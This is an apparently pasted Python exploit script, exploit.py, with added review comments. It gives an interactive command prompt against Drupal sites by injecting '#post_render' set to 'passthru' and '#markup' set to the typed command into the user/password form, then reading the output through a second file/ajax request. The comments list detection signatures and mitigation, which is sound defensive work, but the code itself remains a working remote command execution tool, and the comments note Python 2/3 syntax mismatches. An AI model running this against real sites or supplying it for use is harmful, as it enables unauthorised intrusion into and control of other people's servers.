hexmanx

exploit.py

Jun 11th, 2018
  1. #!/usr/bin/env python3
      # NOTE(review): the shebang names python3, but raw_input() and the print
      # statement further down are Python 2 syntax.
      #
      # Purpose: an interactive loop that sends two HTTP POSTs to a
      # user-supplied URL for every string typed at the prompt. The first POST
      # puts '#'-prefixed properties (#post_render, #markup, #type) under the
      # "name" query parameter of the user/password form; the second replays the
      # form_build_id scraped from the first response through a file/ajax path.
      # The parameter names match Drupal's Form API, so this reads as a proof of
      # concept for a render-array injection -- confirm against the vendor
      # advisory before attributing it to a specific issue.
      #
      # The paste lost its indentation, so the nesting of listing lines 17-36
      # cannot be read off this page.
      #
      # Detection (derived from the requests built below):
      #   * query-string or body keys whose nested name starts with '#'
      #     (name[#post_render][], name[#markup], name[#type]); '#' will be
      #     percent-encoded as %23 on the wire;
      #   * a POST with q=user/password and _triggering_element_name=name,
      #     followed by a POST with q=file/ajax/name/#value/<form_build_id>;
      #   * no headers are set, so the requests library's default User-Agent
      #     is presumably what appears in access logs.
      # Mitigation: install the vendor's security update for the affected CMS;
      # a WAF rule rejecting '#'-prefixed parameter keys is a stopgap only.
      # Hosts that answered such a request pair should be reviewed as possibly
      # compromised.
  2.  
  3. import requests
  4. import re
  5. import urllib3
      # Silences urllib3's InsecureRequestWarning for the whole process.
  6. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
      # Disabled option: a loopback listener on port 8080 (presumably a local
      # intercepting proxy). Nothing below references `proxies`.
  7. #proxies ={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
      # Assigned but never passed to requests.post(); the visible calls therefore
      # run with the library's default certificate verification.
  8. verify = False
  9.  
  10.  
      # URL is read verbatim from stdin; no scheme or host validation is done.
  11. url = raw_input("Url: ")
  12.  
      # Query-string parameters for the first request. The three name[#...] keys
      # are the part a detection rule should key on (see header). 'dir' is only
      # an initial value; it is overwritten on listing line 21 before any send.
  13. get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'dir', 'name[#type]':'markup'}
      # Form body for the first request.
  14. post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  15.  
      # Prompt loop; the literal input "quit" ends it.
  16. while True:
  17. cmd = raw_input("CMD> ")
  18. if cmd == "quit":
  19. break
  20. else:
      # The typed string replaces the #markup value, then request one is sent
      # (data= becomes the form body, params= the query string).
  21. get_params['name[#markup]'] = cmd
  22. r = requests.post(url, data=post_params, params=get_params)
  23.  
      # Scrape the hidden form_build_id field out of the returned HTML.
  24. m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  25. if m:
  26. found = m.group(1)
      # Request two: the scraped id goes into both the q= path and the form body.
  27. get_params2 = {'q':'file/ajax/name/#value/' + found}
  28. post_params2 = {'form_build_id':found}
  29. r = requests.post(url, data=post_params2, params=get_params2)
  30.  
      # Print everything in the response that precedes the first '{' or '['.
      # NOTE(review): pos1 is assigned only inside the `if`; when neither
      # character occurs, the print uses an unset name (NameError) or a value
      # left over from an earlier loop iteration.
  31. string = str(r.text)
  32. for j in range(0,len(string)):
  33. if string[j] == "{" or string[j] == "[":
  34. pos1 = j
  35. break
  36. print string[:pos1]